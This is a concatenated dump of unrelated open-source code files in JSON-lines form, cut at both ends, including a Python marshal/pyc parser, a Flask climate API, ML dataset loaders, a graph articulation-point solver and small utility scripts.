\"TYPE_TUPLE\":\n result = tuple(result)\n elif type == \"TYPE_SET\":\n result = set(result)\n elif type == \"TYPE_FROZENSET\":\n result = frozenset(result)\n\n elif type == \"TYPE_NULL\":\n result = \"null\"\n\n elif type == \"TYPE_NONE\":\n result = None\n\n elif type == \"TYPE_TRUE\":\n result = True\n\n elif type == \"TYPE_FALSE\":\n result = False\n\n elif type == \"TYPE_STOPITER\":\n result = StopIteration\n\n elif type == \"TYPE_ELLIPSIS\":\n result = ...\n\n elif type in (\"TYPE_SHORT_ASCII_INTERNED\", \"TYPE_SHORT_ASCII\"):\n result = self.read_string(short=True)\n\n elif type == \"TYPE_REF\":\n index = self.read_long()\n self.references.append(Reference(byte=i, index=index))\n self.flag_refs[index].usages += 1\n if len(str(self.flag_refs[index])) > 500:\n result = f\"REF to {index} (value omitted)\"\n else:\n result = f\"REF to {index}: {self.flag_refs[index]}\"\n\n elif type == \"TYPE_BINARY_FLOAT\":\n result = bytes_to_float(self.read_bytes(count=8))\n\n elif type == \"TYPE_BINARY_COMPLEX\":\n real = bytes_to_float(self.read_bytes(count=8))\n imag = bytes_to_float(self.read_bytes(count=8))\n result = complex(real, imag)\n\n elif type == \"TYPE_DICT\":\n result = {}\n 
while True:\n key = self.read_object()\n if key == \"null\":\n break\n value = self.read_object()\n result[key] = value\n\n # decrease indentation\n self.indent -= 2\n try:\n self.record_object_result(result)\n except UnboundLocalError:\n message = f\"type [{type}] is recognized but result is not present.\"\n if not self.python_version:\n message += (\n \"\\nThe error is probably caused by an unknown \"\n \"Python version (magic number) if it's a pyc file.\"\n )\n raise RuntimeError(message) from None\n\n # Save the result to the self.references\n if ref_id is not None:\n self.flag_refs[ref_id] = Flag_ref(\n byte=i, type=type, content=result\n )\n\n return result\n\n def read_bytes(self, count: int = 1) -> bytes:\n bytes = b\"\"\n for x in range(count):\n index, int_byte = next(self.iterator)\n byte = int_byte.to_bytes(1, \"little\")\n bytes += byte\n return bytes\n\n def read_string(\n self, size: Optional[int] = None, short: bool = False\n ) -> bytes:\n if size is None:\n if short:\n # short == size is stored as one byte\n size = bytes_to_int(self.read_bytes())\n else:\n # non-short == size is stored as long (4 bytes)\n size = self.read_long()\n bytes = self.read_bytes(size)\n return bytes\n\n def read_long(self, signed: bool = False) -> int:\n bytes = self.read_bytes(count=4)\n return bytes_to_int(bytes, signed=signed)\n\n def read_short(self) -> int:\n b = self.read_bytes(count=2)\n x = b[0]\n x |= b[1] << 8\n # Sign-extension, in case short greater than 16 bits\n x |= -(x & 0x8000)\n return x\n\n def read_py_long(self) -> int:\n n = self.read_long(signed=True)\n result, shift = 0, 0\n for i in range(abs(n)):\n result += self.read_short() << shift\n shift += PyLong_MARSHAL_SHIFT\n\n return result if n > 0 else -result\n\n def set_codeobject_structure(self) -> None:\n \"\"\"Sets self.codeobject_structure representing codeobject\n structure for given Python version\"\"\"\n\n if (\n hasattr(self, \"codeobject_structure\")\n or self.python_version is None\n ):\n return\n\n # Contains all possible code object attributes\n # and their respective methods for parsing them\n structure = [\n (\"argcount\", self.read_long),\n (\"posonlyargcount\", self.read_long),\n (\"kwonlyargcount\", self.read_long),\n (\"nlocals\", self.read_long),\n (\"stacksize\", self.read_long),\n (\"flags\", self.read_long),\n (\"code\", self.read_object),\n (\"consts\", self.read_object),\n (\"names\", self.read_object),\n (\"varnames\", self.read_object),\n (\"freevars\", self.read_object),\n (\"cellvars\", self.read_object),\n (\"localsplusnames\", self.read_object),\n (\"localspluskinds\", self.read_object),\n (\"filename\", self.read_object),\n (\"name\", self.read_object),\n (\"qualname\", self.read_object),\n (\"firstlineno\", self.read_long),\n (\"linetable\", self.read_object),\n (\"exceptiontable\", self.read_object),\n ]\n\n self.codeobject_structure = []\n\n # Skips specific attributes based on Python version\n for name, method in structure:\n if self.python_version < (3, 11):\n # Available in 3.11+\n if name in (\n \"localsplusnames\",\n \"localspluskinds\",\n \"qualname\",\n \"exceptiontable\",\n ):\n continue\n else:\n # Removed in 3.11\n if name in (\"nlocals\", \"varnames\", \"freevars\", \"cellvars\"):\n continue\n\n if self.python_version < (3, 8):\n # Available in 3.8+\n if name == \"posonlyargcount\":\n continue\n\n self.codeobject_structure.append((name, method))\n\n if DEBUG:\n from pprint import pprint\n\n print(\"Codeobject structure:\")\n pprint(self.codeobject_structure)\n\n def 
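# --- Illustrative check of the 15-bit digit scheme that read_py_long above
# --- reassembles: marshal stores Python longs little-endian in base 2**15.
# --- The digits below are worked out by hand for the value 70000.
PyLong_MARSHAL_SHIFT = 15
digits = [4464, 2]        # 70000 = 4464 + 2 * 2**15
value, shift = 0, 0
for d in digits:
    value += d << shift
    shift += PyLong_MARSHAL_SHIFT
assert value == 70000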
read_codeobject(self) -> Dict[str, Any]:\n self.set_codeobject_structure()\n\n co = dict()\n for name, method in self.codeobject_structure:\n co[name] = method() # type: ignore\n\n return co\n\n def unused_ref_flags(self) -> List[Tuple[int, Flag_ref]]:\n unused = []\n for index, flag_ref in enumerate(self.flag_refs):\n if flag_ref.usages == 0:\n unused.append((index, flag_ref))\n return unused\n\n def clear_unused_ref_flags(self, overwrite: bool = False) -> None:\n # List of flag_refs and references ordered by number of byte in a file\n final_list = self.flag_refs + self.references\n final_list.sort(key=lambda x: x.byte)\n # a map where at a beginning, index in list == number of flag_ref\n # but when unused flag is removed:\n # - numbers in the list are original numbers of flag_refs\n # - indexes of the list are new numbers\n flag_ref_map = list(range(len(self.flag_refs)))\n # new mutable content\n content = bytearray(self.bytes)\n\n removed_count = 0\n for r in final_list:\n if isinstance(r, Flag_ref) and r.usages == 0:\n # Clear FLAG_REF bit and remove it from map\n # all subsequent refs will have lower index in the map\n flag_ref_map.remove(self.flag_refs.index(r))\n content[r.byte] = clearBit(content[r.byte], 7)\n removed_count += 1\n elif isinstance(r, Reference):\n # Find a new index of flag_ref after some was removed\n new_index = flag_ref_map.index(r.index)\n # write new number as 4-byte integer\n content[r.byte + 1 : r.byte + 5] = new_index.to_bytes(\n 4, \"little\"\n )\n\n # Skip writing if there is no difference\n if bytes(content) != self.bytes:\n if overwrite:\n suffix = \"\"\n else:\n suffix = \".fixed\"\n\n new_name = self.filename.with_suffix(suffix + self.filename.suffix)\n print(f\"Removed {removed_count} unused FLAG_REFs from {new_name}\")\n\n with open(new_name, mode=\"wb\") as fh:\n fh.write(content)\n else:\n print(f\"No unused FLAG_REFs in {self.filename}\")\n\n\ndef main() -> None:\n arg_parser = argparse.ArgumentParser(\n description=\"Marshalparser and fixer for .pyc files\"\n )\n arg_parser.add_argument(\n \"-p\",\n \"--print\",\n action=\"store_true\",\n dest=\"print\",\n default=False,\n help=\"Print human-readable parser output\",\n )\n arg_parser.add_argument(\n \"-u\",\n \"--unused\",\n action=\"store_true\",\n dest=\"unused\",\n default=False,\n help=\"Print unused references\",\n )\n arg_parser.add_argument(\n \"-f\",\n \"--fix\",\n action=\"store_true\",\n dest=\"fix\",\n default=False,\n help=\"Fix references\",\n )\n arg_parser.add_argument(\n \"-o\",\n \"--overwrite\",\n action=\"store_true\",\n dest=\"overwrite\",\n default=False,\n help=\"Overwrite existing pyc file (works with --fix)\",\n )\n arg_parser.add_argument(metavar=\"files\", dest=\"files\", nargs=\"*\")\n\n args = arg_parser.parse_args()\n\n for file in args.files:\n parser = MarshalParser(Path(file))\n parser.parse()\n if args.print:\n print(parser.output)\n if args.unused:\n unused = parser.unused_ref_flags()\n if unused:\n print(\"Unused FLAG_REFs:\")\n print(\"\\n\".join([f\"{i} - {f}\" for i, f in unused]))\n\n if args.fix:\n parser.clear_unused_ref_flags(overwrite=args.overwrite)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fedora-python/marshalparser","sub_path":"marshalparser/marshalparser.py","file_name":"marshalparser.py","file_ext":"py","file_size_in_byte":14909,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"54"} +{"seq_id":"17419957259","text":"# SQL Alchemy Challenge!\nfrom flask import Flask, jsonify\nimport numpy 
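# --- Illustrative sketch of the FLAG_REF convention handled in read_object
# --- above: marshal sets bit 7 of the type byte when the object must be
# --- remembered for later TYPE_REF lookups. Standalone helpers, not the repo's.
def test_bit(value, bit):
    return (value >> bit) & 1 == 1

def clear_bit(value, bit):
    return value & ~(1 << bit)

type_byte = 0xE9                      # 'i' (TYPE_INT, 0x69) with the ref flag set
assert test_bit(type_byte, 7)
assert chr(clear_bit(type_byte, 7)) == "i"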
as np\nimport datetime as dt\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\nengine = create_engine(\"sqlite:///hawaii.sqlite\")\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n#################################################\n# Flask Routes\n#################################################\n@app.route(\"/\")\ndef welcome():\n return (\n f\"
Welcome to the Climate API!<br/><br/>\"\n        f\"Available Routes:<br/>\"\n        f\"/api/v1.0/precipitation<br/>\"\n        f\"/api/v1.0/stations<br/>\"\n        f\"/api/v1.0/tobs<br/><br/>\"\n        f\"For these, instead of start_date/end_date, type in date as YYYY-MM-DD:<br/><br/>\"\n        f\"/api/v1.0/start_date<br/>\"\n        f\"/api/v1.0/start_date/end_date\"\n    )\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n    session = Session(engine)\n    results = session.query(Measurement.date, Measurement.prcp).all()\n    session.close()\n    return jsonify(results)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n    session = Session(engine)\n    results = session.query(Station.name).all()\n    session.close()\n    return jsonify(results)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n    session = Session(engine)\n    results = session.query(Measurement.date, Measurement.tobs).\\\n        filter(Measurement.date >= '2016-08-23').\\\n        filter(Measurement.station == 'USC00519281').all()\n    session.close()\n\n    return jsonify(results)\n\n@app.route(\"/api/v1.0/<start>\")\ndef trip(start):\n    session = Session(engine)\n    start_date= dt.datetime.strptime(start, '%Y-%m-%d')\n    last_year = dt.timedelta(days=365)\n    start = start_date-last_year\n    end = dt.date(2017, 8, 23)\n    trip_data = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\\\n        filter(Measurement.date >= start).filter(Measurement.date <= end).all()\n    trip = list(np.ravel(trip_data))\n    return jsonify(trip)\n\n@app.route(\"/api/v1.0/<start>/<end>\")\ndef trip_2(start,end):\n    session = Session(engine)\n    start_date= dt.datetime.strptime(start, '%Y-%m-%d')\n    end_date= dt.datetime.strptime(end,'%Y-%m-%d')\n    last_year = dt.timedelta(days=365)\n    start = start_date-last_year\n    end = end_date-last_year\n    trip_data = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\\\n        filter(Measurement.date >= start).filter(Measurement.date <= end).all()\n    trip = list(np.ravel(trip_data))\n    return jsonify(trip)\n\nif __name__ == \"__main__\":\n    app.run(debug=True)\n","repo_name":"jwhite1987/Climate-Analysis","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"39913753274","text":"import random\nimport numpy as np\nimport cv2.cv2 as cv2\nimport torch.utils.data as data\nfrom data import common\nfrom .tools import get_circle_matrix\n\n\nclass Dataset(data.Dataset):\n    def __init__(self, args, mode='train'):\n        super(Dataset, self).__init__()\n        self.args = args\n        self.mode = mode\n\n        self.rotational = args.rotational\n        self.height = args.rotational_height\n        self.width = args.rotational_width\n        self.rotational_patch_size = args.patch_size\n        self.noise_level = args.noise_level\n\n        self.step_range = args.rotational_test_step\n\n        self.testangle = 3.0\n\n        center = (int(self.height / 2), int(self.width / 2))\n        circle_dic, radius, hole_matrix = get_circle_matrix((self.height, self.width), center=center)\n        self.circle_dic = circle_dic\n        self.radius = radius\n        self.hole_matrix = hole_matrix\n\n    def set_teststep(self, testangle):\n        self.testangle = testangle\n        return\n\n    def __getitem__(self, idx):\n\n        pad_width = 0\n        if self.mode == 'train':\n            blurred_path = self.datasets['train'][idx]\n            sharp_path = blurred_path.replace('/blur/', '/sharp/')\n\n            blurred = cv2.imread(blurred_path, -1)\n            sharp = cv2.imread(sharp_path, -1)\n            imgs = [blurred, sharp]\n            imgs = common.chose_part(*imgs, ps=self.rotational_patch_size)\n            if self.args.augment:\n                imgs = common.augment(*imgs, hflip=True, rot=True, shuffle=True, change_saturation=False,\n                                      rgb_range=self.args.rgb_range)\n\n        else:\n            step = self.testangle\n            blurred_path = self.datasets[step][idx]\n            sharp_path = blurred_path.replace('/blur/', 
'/sharp/')\n blurred = cv2.imread(blurred_path)\n sharp = cv2.imread(sharp_path)\n imgs = [blurred, sharp]\n\n if self.args.gaussian_pyramid:\n imgs = common.generate_pyramid(*imgs, n_scales=self.args.n_scales)\n\n imgs = common.np2tensor(*imgs)\n relpath = blurred_path.split('/')[-1].split('start')[0] + '.bmp'\n blur = imgs[0]\n sharp = imgs[1] if len(imgs) > 1 else False\n blur_field = 1\n\n return blur, sharp, pad_width, blur_field, idx, relpath\n\n def __len__(self):\n if self.mode == 'train':\n return len(self.datasets[self.mode])\n else:\n return len(self.datasets[self.step_range[0]])","repo_name":"Jinhui-Qin/RotaryDeblurring","sub_path":"data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"11926920702","text":"from sys import stdin\r\ndef dfs(u,parent,ap,depth,low):\r\n\tglobal G\r\n\tchildren = 0\r\n\r\n\tfor v in G[u]:\r\n\t\tif depth[v] ==-1:\r\n\t\t\tdepth[v] = low[v] = depth[u]+1\r\n\t\t\tparent[v] = u\r\n\t\t\tchildren+=1\r\n\t\t\tdfs(v,parent,ap,depth,low)\r\n\t\t\tlow[u] = min(low[u],low[v])\r\n\t\t\tif parent[u] == -1 and children > 1:\r\n\t\t\t\tap[u] = 1\r\n\t\t\tif parent[u] != -1 and low[v] >= depth[u]:\r\n\t\t\t\tap[u] = 1\r\n\t\telif depth[v] < depth[u]:\r\n\t\t\tlow[u] = min(low[u],depth[v])\r\n\treturn\r\n\r\ndef tarjan():\r\n\tglobal G\t\r\n\tn = len(G)\r\n\tparent = [-1 for _ in range(n)]\r\n\tap=[0 for _ in range(n)]\r\n\tdepth = [-1 for _ in range(n)]\r\n\tlow = [-1 for _ in range(n)]\r\n\tfor u in range(n):\r\n\t\tif depth[u]==-1:\r\n\t\t\tdepth[u]=low[u]=0\r\n\t\t\tdfs(u,parent,ap,depth,low)\r\n\t\r\n\tcap = 0\r\n\tfor i in range(n):\r\n\t\tif ap[i] == 1:\r\n\t\t\tcap+=1\r\n\tprint(cap)\r\n\t\t\t\r\n\treturn\r\ndef main():\r\n\tglobal G\r\n\tn = int(stdin.readline())\r\n\twhile n != 0:\r\n\t\tG = [[] for _ in range(n)]\r\n\t\tline = stdin.readline().strip().split()\r\n\t\twhile len(line)>1:\t\t\t\r\n\t\t\tindex = int(line[0])-1\t\t\t\r\n\t\t\ti = 1\r\n\t\t\twhile i < len(line):\r\n\t\t\t\tG[index].append(int(line[i])-1)\r\n\t\t\t\tG[int(line[i])-1].append(index)\t\t\t\t\r\n\t\t\t\ti+=1\r\n\t\t\tline = stdin.readline().strip().split()\r\n\t\ttarjan()\r\n\t\tn = int(stdin.readline())\r\n\treturn\r\nmain()\r\n\r\n\r\n\t\t\r\n","repo_name":"Juanma1909/AGRA","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72709529440","text":"from setuptools import setup\n\nwith open('README.md') as README:\n long_description = README.read()\nsetup(\n name='pydl',\n version='0.1d',\n packages=['pydl', ],\n license='MIT',\n description='A Library to download music from Youtube , Soundcloud and many others sites',\n long_description=long_description,\n author='Ayan Bag',\n author_email='ayanbag9474@gmail.com',\n install_requires=[\n 'requests',\n 'youtube-dl',\n ],\n python_requires='>=3.4',\n classifiers=[\n \"Programming Language :: Python :: 3.5\",\n \"License :: OSI Approved :: MIT License\",\n ],\n entry_points=dict(console_scripts=[\n 'pydl = pydl.dlutil:main', ]),\n url='https://github.com/ayanbag/pydl',\n)","repo_name":"ayanbag/pydl","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3127650881","text":"from fastapi import APIRouter, Depends, 
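# --- Quick standalone check of the articulation-point logic above
# --- (illustrative re-statement, not the repository's stdin-driven code):
# --- in the path graph 0-1-2 only the middle vertex is a cut vertex.
def count_articulation_points(adj):
    n = len(adj)
    depth, low, ap = [-1] * n, [0] * n, [False] * n

    def dfs(u, parent, d):
        depth[u] = low[u] = d
        children = 0
        for v in adj[u]:
            if depth[v] == -1:
                children += 1
                dfs(v, u, d + 1)
                low[u] = min(low[u], low[v])
                if parent != -1 and low[v] >= depth[u]:
                    ap[u] = True
            elif v != parent:
                low[u] = min(low[u], depth[v])
        if parent == -1 and children > 1:
            ap[u] = True

    for u in range(n):
        if depth[u] == -1:
            dfs(u, -1, 0)
    return sum(ap)

assert count_articulation_points([[1], [0, 2], [1]]) == 1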
status, HTTPException\nfrom sqlalchemy.orm import Session\nfrom typing import List\n\nfrom ..database import get_db\nfrom .. import schemas\nfrom ..crud import audience\n\n\nrouter = APIRouter(\n prefix=\"/audiences\",\n tags=[\"audiences\"],\n responses={404: {\"description\": \"Not found\"}},\n)\n\n\n@router.get(\"/\", response_model=List[schemas.AudienceBase])\ndef get_audiences(db: Session = Depends(get_db)):\n db_audience = audience.get_objs(db=db)\n\n return db_audience\n\n\n@router.get(\"/{id}\", response_model=schemas.AudienceBase)\ndef get_audience(id: int, db: Session = Depends(get_db)):\n db_audience = audience.get_obj(db=db, id=id)\n\n if db_audience is None:\n raise HTTPException(status_code=404, detail=\"Audience not found\")\n return db_audience\n\n\n@router.post('/', status_code=status.HTTP_201_CREATED)\ndef create_audience(payload: schemas.AudienceBase, db: Session = Depends(get_db)):\n new_audience = audience.get_obj(db=db, id=payload.audience_number)\n if new_audience:\n raise HTTPException(status_code=400, detail=\"This number audience is exist\")\n\n new_audience = audience.create_obj(db=db, new_object=payload)\n return {\"status\": \"success\", \"object\": new_audience}","repo_name":"Xei201/university","sub_path":"src/university/routers/audience.py","file_name":"audience.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74395739360","text":"import pandas as pd\nimport sys\n\n\ndef compute_max_min(file):\n df = pd.read_csv(\n file,\n encoding=\"gbk\",\n header=0,\n index_col=0,\n sep=',',\n names=[\n 'Time',\n '330温度',\n '330湿度',\n '329温度',\n '329湿度',\n '327温度',\n '327湿度',\n '328温度',\n '328湿度',\n ],\n )\n\n df.loc['最大值'] = df.apply(lambda x: x.max())\n df.loc['最小值'] = df.apply(lambda x: x.min())\n df.loc['差值'] = df.apply(lambda x: float(x.max()) - float(x.min()))\n df.to_csv(\n 'new-' + file,\n encoding=\"gbk\",\n )\n pass\n\n\nif __name__ == '__main__':\n file = sys.argv[1]\n compute_max_min(file)","repo_name":"yuzhiyongcn/ExcelHandler","sub_path":"min_max/compute_min_max.py","file_name":"compute_min_max.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73687176801","text":"import unittest\n\nfrom parameterized import parameterized\n\nfrom mimicbot import filter\n\nclass TestFilter(unittest.TestCase):\n\n filter = None\n\n def __init__(self, *args, **kwargs):\n super(TestFilter, self).__init__(*args, **kwargs)\n self.filter = filter.Filter()\n\n def test_check_not_empty(self):\n func = self.filter.check_not_empty\n self.assertRaises(Exception, lambda: func(\"\"))\n\n def test_check_too_long_pass(self):\n func = self.filter.check_too_long\n text = \"a\" * 140\n func(text)\n\n def test_check_too_long_fail(self):\n func = self.filter.check_too_long\n text = \"a\" * 141\n self.assertRaises(Exception, lambda: func(text))\n\n @parameterized.expand([\n \"http\",\n \"https\",\n ])\n def test_check_contains_link_pass(self, text):\n func = self.filter.check_contains_link\n func(text)\n\n @parameterized.expand([\n \"http://example.com\",\n \"https://example.com\",\n ])\n def test_check_contains_link_fail(self, text):\n func = self.filter.check_contains_link\n self.assertRaises(Exception, lambda: func(text))\n\n def test_check_contains_username_pass(self):\n func = self.filter.check_contains_username\n text = \"@ username\"\n func(text)\n\n def 
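# --- Illustrative usage sketch (not from the repository above): an APIRouter
# --- like the /audiences one is exposed by mounting it on the application.
# --- Router and route names here are hypothetical.
from fastapi import APIRouter, FastAPI

ping_router = APIRouter(prefix="/ping", tags=["ping"])

@ping_router.get("/")
def ping():
    return {"status": "ok"}

app = FastAPI()
app.include_router(ping_router)  # the app now serves GET /ping/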
test_check_contains_username_fail(self):\n        func = self.filter.check_contains_username\n        text = \"@username\"\n        self.assertRaises(Exception, lambda: func(text))\n\n    @parameterized.expand([\n        \"*action text*\",\n        \"don't\",\n        \"don’t\",\n        \"\\\"double quotes\\\"\",\n        \"'single quotes'\",\n        \"'\\\"nested\\\" double quotes'\",\n        \"\\\"'nested' single quotes\\\"\",\n        \"“double curly quotes”\",\n        \"‘single curly quotes’\",\n        \"‘“nested” double curly quotes’\",\n        \"“‘nested’ single curly quotes”\",\n        \"(round braces)\",\n        \"[square braces]\",\n        \"{curly braces}\",\n        \"((nested) round brackets)\",\n        \"[[nested] square brackets]\",\n        \"{{nested} curly brackets}\",\n    ])\n    def test_check_syntax_pass(self, text):\n        func = self.filter.check_syntax\n        func(text)\n\n    @parameterized.expand([\n        \"*unbalanced action text\",\n        \"don\\\"t\",\n        \"don‘t\",\n        \"don“t\",\n        \"don”t\",\n        \"\\\"unbalanced double quote\",\n        \"'unbalanced single quote\",\n        \"“unbalanced curly left double quote\",\n        \"unbalanced curly right double quote”\",\n        \"‘unbalanced curly left single quote\",\n        \"unbalanced curly right single quote’\",\n        \"(unbalanced opening round bracket\",\n        \"unbalanced closing round bracket)\",\n        \"[unbalanced opening square bracket\",\n        \"unbalanced closing square bracket]\",\n        \"{unbalanced opening curly bracket\",\n        \"unbalanced closing curly bracket}\",\n        \"((unbalanced nested opening round bracket)\",\n        \"(unbalanced nested closing round bracket))\",\n        \"[[unbalanced nested opening square bracket]\",\n        \"[unbalanced nested closing square bracket]]\",\n        \"{{unbalanced nested opening curly bracket}\",\n        \"{unbalanced nested closing curly bracket}}\",\n    ])\n    def test_check_syntax_fail(self, text):\n        func = self.filter.check_syntax\n        self.assertRaises(Exception, lambda: func(text))\n","repo_name":"nomicode/mimicbot","sub_path":"tests/test_filter.py","file_name":"test_filter.py","file_ext":"py","file_size_in_byte":3334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21652384367","text":"from __future__ import print_function\nimport tensorflow as tf\n\nfilename_queue = tf.train.string_input_producer([\"data.csv\"])\n\nreader = tf.TextLineReader()\nkey, value = reader.read(filename_queue)\n\nrecord_defaults = [tf.as_string([1]), [1], [1], [1], [1], [1], [1], [1]]\ncol1, col2, col3, col4, col5, col6, col7, col8 = tf.decode_csv(\n    value, record_defaults=record_defaults)\nfeatures = tf.stack([col2, col3, col4, col5, col6, col7, col8])\n\nwith tf.Session() as sess:\n    # Start populating the filename queue.\n    coord = tf.train.Coordinator()\n    threads = tf.train.start_queue_runners(coord=coord)\n\n    for i in range(0,8):\n        # Retrieve a single instance:\n        try:\n            example, label = sess.run([features, col1])\n            print(example)\n            print(label)\n        except tf.errors.OutOfRangeError:\n            break\n\n    # for i in range(4, 8):\n    #     try:\n    #         example2, label2 = sess.run([features, col1])\n    #         print(example2)\n    #         print\n\n    coord.request_stop()\n    coord.join(threads)\n\n","repo_name":"dunkelhaus/cancerTherapy","sub_path":"modules/NeuralNet/core/classifiers/dnnClassifier/exampleCSVRead.py","file_name":"exampleCSVRead.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"4996143842","text":"import jittor as jt\nfrom j_nerf.Method.config import get_cfg\nfrom j_nerf.Method.global_vars import proj_options\nfrom jittor import Function\n\n\nclass SHEncoder(Function):\n    def __init__(self):\n        
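# --- Illustrative sketch of a stack-based balance check like the one the
# --- bracket/quote test cases above exercise (the actual mimicbot
# --- implementation may differ).
def is_balanced(text):
    pairs = {")": "(", "]": "[", "}": "{"}
    stack = []
    for ch in text:
        if ch in "([{":
            stack.append(ch)
        elif ch in pairs:
            if not stack or stack.pop() != pairs[ch]:
                return False
    return not stack

assert is_balanced("((nested) round brackets)")
assert not is_balanced("{unbalanced closing curly bracket}}")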
self.cfg = get_cfg()\n self.num_elements = 4194304\n self.m_n_padded_output_dims = 16\n self.m_sh_degree = 4\n self.m_n_to_pad = 0\n self.grad_type = \"float16\"\n header_path = \"../j-nerf/j_nerf/Cpp/sh_encoder/\"\n proj_options[f\"FLAGS: -I{header_path}\"] = 1\n self.out_dim = self.m_n_padded_output_dims\n return\n\n def execute(self, x):\n self.num_elements = x.shape[0]\n\n output = jt.code(\n (self.num_elements, 16),\n self.grad_type,\n [x],\n cuda_header='#include \"SphericalEncode.h\"',\n cuda_src=f\"\"\"\n \n #define grad_t out_type\n\n uint32_t num_elements=in0_shape0;\n uint32_t m_n_padded_output_dims={self.m_n_padded_output_dims};\n uint32_t m_sh_degree={self.m_sh_degree};\n uint32_t m_n_to_pad={self.m_n_to_pad};\n \n cudaStream_t stream=0;\n \n PitchedPtr inputs={{in0_p,in0_shape1}};\n\t\tPitchedPtr outputs={{out_p,out_shape1}};\n\t\tfloat* dy_dx = nullptr;\n linear_kernel(kernel_sh, 0, stream,\n\t\t\tnum_elements,\n\t\t\tm_sh_degree,\n\t\t\tm_n_to_pad,\n\t\t\tinputs,\n outputs,\n\t\t\tdy_dx\n\t\t);\n \"\"\",\n )\n output.compile_options = proj_options\n return output\n\n def grad(self, grad_x):\n return None\n","repo_name":"565353780/j-nerf","sub_path":"j_nerf/Model/sh_encoder.py","file_name":"sh_encoder.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73039339041","text":"import sys\nn = int(input())\nsigns = input().split()\ndp = [False] * 10\n\n\n\ndef possible(s, t, index):\n \n if signs[index] == \"<\":\n return s < t\n elif signs[index] == \">\":\n return s > t\n \nmx, mn = \"\", \"\"\ndef find(s, index):\n \n global mx, mn\n if index == n+1:\n if len(mn) == 0:\n mn = s\n else:\n mx = s\n return\n for i in range(10):\n if len(s) == 0:\n dp[i] = True\n find(s + str(i), index + 1)\n dp[i] = False\n elif not dp[i] and possible(s[-1], str(i), index - 1):\n dp[i] = True\n find(s + str(i), index + 1)\n dp[i] = False\n\nfind(\"\", 0)\nprint(mx)\nprint(mn)","repo_name":"jeean0668/algorithm","sub_path":"BS/2529.py","file_name":"2529.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36806617785","text":"a = input (\"inter an integer:\\n\")\na = int(a)\nif (a < 0):\n print (\"-- enter a number greater than 0 --\")\nelif (a <= 2):\n print (\"no\")\nelse:\n i = 2\n # initialize a sum variable with 0\n s = 1\n while i < a:\n if (a % i == 0):\n s += i\n i += 1\n if (s == a):\n print(\"yes\")\n else:\n print(\"no\")\n","repo_name":"lachqarhamza/python-scripts","sub_path":"TP1/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"11657129779","text":"import cv2\nimport numpy as np\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import filedialog\nfrom PIL import Image, ImageTk\nimport os\nimport sys\nimport pandas as pd\nimport datetime\nimport re\n\n\nclass MainClass(object):\n\n def __init__(self):\n\n self.img_o = np.zeros((1, 1, 3), dtype='float32')\n self.img_find_lig = np.zeros((1, 1, 3), dtype='float32') #imagem com fundo BRANCO para contabilizar os pixels pretos do ligante\n self.img_find_bri = np.zeros((1, 1, 3), dtype='float32') #imagem com fundo PRETO para contabilizar os pixels pretos do brilho do ligante\n self.img_find_agr = np.zeros((1, 1, 3), dtype='float32') #imagem com fundo PRETO e partículas BRANCAS para contar os agregados 
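# --- Side note on the perfect-number check above (illustrative): summing
# --- proper divisors only up to sqrt(n) gives the same answer faster.
import math

def is_perfect(n):
    if n < 2:
        return False
    s = 1  # 1 divides every n > 1
    for d in range(2, math.isqrt(n) + 1):
        if n % d == 0:
            s += d + (n // d if d != n // d else 0)
    return s == n

assert [n for n in range(2, 500) if is_perfect(n)] == [6, 28, 496]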
